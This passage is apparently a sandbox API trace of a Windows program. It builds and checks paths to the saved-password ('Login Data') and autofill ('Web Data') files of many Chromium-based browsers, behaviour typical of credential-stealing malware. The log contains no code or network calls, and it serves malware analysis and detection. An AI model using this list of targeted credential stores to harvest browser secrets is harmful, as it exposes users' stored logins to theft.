| out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 68 [0312.638] GetProcessHeap () returned 0x780000 [0312.638] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8c) returned 0x79c2b8 [0312.638] GetProcessHeap () returned 0x780000 [0312.638] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.639] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Spark\\User Data\\Default\\Web Data") returned 0 [0312.640] GetProcessHeap () returned 0x780000 [0312.640] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.640] GetProcessHeap () returned 0x780000 [0312.640] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.641] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.641] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 51 [0312.641] GetProcessHeap () returned 0x780000 [0312.641] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6a) returned 0x79c298 [0312.641] GetProcessHeap () returned 0x780000 [0312.642] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.643] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Login Data") returned 0 [0312.643] GetProcessHeap () returned 0x780000 [0312.643] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.643] GetProcessHeap () returned 0x780000 [0312.643] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.644] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.645] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 59 [0312.645] GetProcessHeap () returned 0x780000 [0312.645] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79c2a8 [0312.645] GetProcessHeap () returned 0x780000 [0312.645] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.646] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSpark\\Default\\Login Data") returned 0 [0312.646] GetProcessHeap () returned 0x780000 [0312.647] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.647] GetProcessHeap () returned 0x780000 [0312.647] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.647] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.648] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 73 [0312.648] GetProcessHeap () returned 0x780000 [0312.648] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x96) returned 0x79c2c0 [0312.648] GetProcessHeap () returned 0x780000 [0312.649] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.650] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Login Data") returned 0 [0312.650] GetProcessHeap () returned 0x780000 [0312.650] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.650] GetProcessHeap () returned 0x780000 [0312.650] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.651] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.668] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 71 [0312.668] GetProcessHeap () returned 0x780000 [0312.668] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x92) returned 0x79c2b8 [0312.668] GetProcessHeap () returned 0x780000 [0312.669] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.670] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 0 [0312.670] GetProcessHeap () returned 0x780000 [0312.670] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.670] GetProcessHeap () returned 0x780000 [0312.670] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.671] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.672] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 54 [0312.672] GetProcessHeap () returned 0x780000 [0312.672] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x70) returned 0x79c298 [0312.672] GetProcessHeap () returned 0x780000 [0312.672] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.673] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 0 [0312.673] GetProcessHeap () returned 0x780000 [0312.674] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.674] GetProcessHeap () returned 0x780000 [0312.674] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.674] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.675] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 62 [0312.675] GetProcessHeap () returned 0x780000 [0312.675] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x80) returned 0x79c2a8 [0312.675] GetProcessHeap () returned 0x780000 [0312.675] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.676] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 0 [0312.677] GetProcessHeap () returned 0x780000 [0312.677] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.677] GetProcessHeap () returned 0x780000 [0312.677] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.677] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.678] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 78 [0312.678] GetProcessHeap () returned 0x780000 [0312.678] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa0) returned 0x78ae50 [0312.678] GetProcessHeap () returned 0x780000 [0312.679] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.680] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 0 [0312.680] GetProcessHeap () returned 0x780000 [0312.680] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78ae50 | out: hHeap=0x780000) returned 1 [0312.680] GetProcessHeap () returned 0x780000 [0312.680] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.681] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.682] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 76 [0312.682] GetProcessHeap () returned 0x780000 [0312.682] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x9c) returned 0x78ae50 [0312.682] GetProcessHeap () returned 0x780000 [0312.682] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.683] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 0 [0312.684] GetProcessHeap () returned 0x780000 [0312.684] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78ae50 | out: hHeap=0x780000) returned 1 [0312.684] GetProcessHeap () returned 0x780000 [0312.684] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.685] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.685] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 59 [0312.685] GetProcessHeap () returned 0x780000 [0312.685] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79c298 [0312.685] GetProcessHeap () returned 0x780000 [0312.686] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.687] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 0 [0312.687] GetProcessHeap () returned 0x780000 [0312.687] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.687] GetProcessHeap () returned 0x780000 [0312.687] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.688] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.689] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 67 [0312.689] GetProcessHeap () returned 0x780000 [0312.689] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8a) returned 0x79c2a8 [0312.689] GetProcessHeap () returned 0x780000 [0312.689] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.690] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 0 [0312.690] GetProcessHeap () returned 0x780000 [0312.690] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.690] GetProcessHeap () returned 0x780000 [0312.690] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.691] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.692] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 70 [0312.692] GetProcessHeap () returned 0x780000 [0312.692] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x90) returned 0x79c2c0 [0312.692] GetProcessHeap () returned 0x780000 [0312.692] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.693] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 0 [0312.693] GetProcessHeap () returned 0x780000 [0312.694] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.694] GetProcessHeap () returned 0x780000 [0312.694] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.694] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.695] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 68 [0312.695] GetProcessHeap () returned 0x780000 [0312.695] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8c) returned 0x79c2b8 [0312.695] GetProcessHeap () returned 0x780000 [0312.696] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.697] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 0 [0312.697] GetProcessHeap () returned 0x780000 [0312.698] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.698] GetProcessHeap () returned 0x780000 [0312.698] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.700] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.701] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 51 [0312.701] GetProcessHeap () returned 0x780000 [0312.701] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6a) returned 0x79c298 [0312.701] GetProcessHeap () returned 0x780000 [0312.702] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.703] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 0 [0312.703] GetProcessHeap () returned 0x780000 [0312.704] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.704] GetProcessHeap () returned 0x780000 [0312.704] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.704] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.705] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 59 [0312.705] GetProcessHeap () returned 0x780000 [0312.705] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79c2a8 [0312.705] GetProcessHeap () returned 0x780000 [0312.706] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.706] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 0 [0312.706] GetProcessHeap () returned 0x780000 [0312.707] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.707] GetProcessHeap () returned 0x780000 [0312.707] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.707] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.708] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 85 [0312.708] GetProcessHeap () returned 0x780000 [0312.708] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xae) returned 0x79c2c0 [0312.708] GetProcessHeap () returned 0x780000 [0312.708] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.709] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0 [0312.709] GetProcessHeap () returned 0x780000 [0312.710] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.710] GetProcessHeap () returned 0x780000 [0312.710] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.710] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.711] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 83 [0312.711] GetProcessHeap () returned 0x780000 [0312.711] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xaa) returned 0x79c2b8 [0312.711] GetProcessHeap () returned 0x780000 [0312.712] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.712] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 0 [0312.713] GetProcessHeap () returned 0x780000 [0312.713] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.713] GetProcessHeap () returned 0x780000 [0312.713] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.734] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.735] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 66 [0312.735] GetProcessHeap () returned 0x780000 [0312.735] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x88) returned 0x79c298 [0312.735] GetProcessHeap () returned 0x780000 [0312.736] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.736] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 0 [0312.737] GetProcessHeap () returned 0x780000 [0312.737] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.737] GetProcessHeap () returned 0x780000 [0312.737] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.737] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.738] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 74 [0312.738] GetProcessHeap () returned 0x780000 [0312.738] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x98) returned 0x79c2a8 [0312.738] GetProcessHeap () returned 0x780000 [0312.739] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.740] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 0 [0312.740] GetProcessHeap () returned 0x780000 [0312.740] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.740] GetProcessHeap () returned 0x780000 [0312.740] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.741] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.742] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 85 [0312.742] GetProcessHeap () returned 0x780000 [0312.742] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xae) returned 0x79c2c0 [0312.742] GetProcessHeap () returned 0x780000 [0312.742] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.744] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 0 [0312.744] GetProcessHeap () returned 0x780000 [0312.745] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.745] GetProcessHeap () returned 0x780000 [0312.745] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.747] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.748] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 83 [0312.748] GetProcessHeap () returned 0x780000 [0312.748] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xaa) returned 0x79c2b8 [0312.748] GetProcessHeap () returned 0x780000 [0312.748] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.749] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 0 [0312.749] GetProcessHeap () returned 0x780000 [0312.749] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.749] GetProcessHeap () returned 0x780000 [0312.749] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.750] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.751] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 66 [0312.751] GetProcessHeap () returned 0x780000 [0312.751] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x88) returned 0x79c298 [0312.751] GetProcessHeap () returned 0x780000 [0312.751] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.752] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 0 [0312.752] GetProcessHeap () returned 0x780000 [0312.753] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.753] GetProcessHeap () returned 0x780000 [0312.753] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.753] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.754] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 74 [0312.754] GetProcessHeap () returned 0x780000 [0312.754] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x98) returned 0x79c2a8 [0312.754] GetProcessHeap () returned 0x780000 [0312.754] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.755] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 0 [0312.755] GetProcessHeap () returned 0x780000 [0312.756] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.756] GetProcessHeap () returned 0x780000 [0312.756] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.757] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.758] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 79 [0312.758] GetProcessHeap () returned 0x780000 [0312.758] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa2) returned 0x79c2c0 [0312.758] GetProcessHeap () returned 0x780000 [0312.758] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.759] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 0 [0312.759] GetProcessHeap () returned 0x780000 [0312.759] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.759] GetProcessHeap () returned 0x780000 [0312.759] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.760] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.761] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 77 [0312.761] GetProcessHeap () returned 0x780000 [0312.761] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x9e) returned 0x78abb0 [0312.761] GetProcessHeap () returned 0x780000 [0312.761] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.762] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 0 [0312.762] GetProcessHeap () returned 0x780000 [0312.763] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78abb0 | out: hHeap=0x780000) returned 1 [0312.763] GetProcessHeap () returned 0x780000 [0312.763] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.763] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.764] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 60 [0312.764] GetProcessHeap () returned 0x780000 [0312.764] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7c) returned 0x79c298 [0312.764] GetProcessHeap 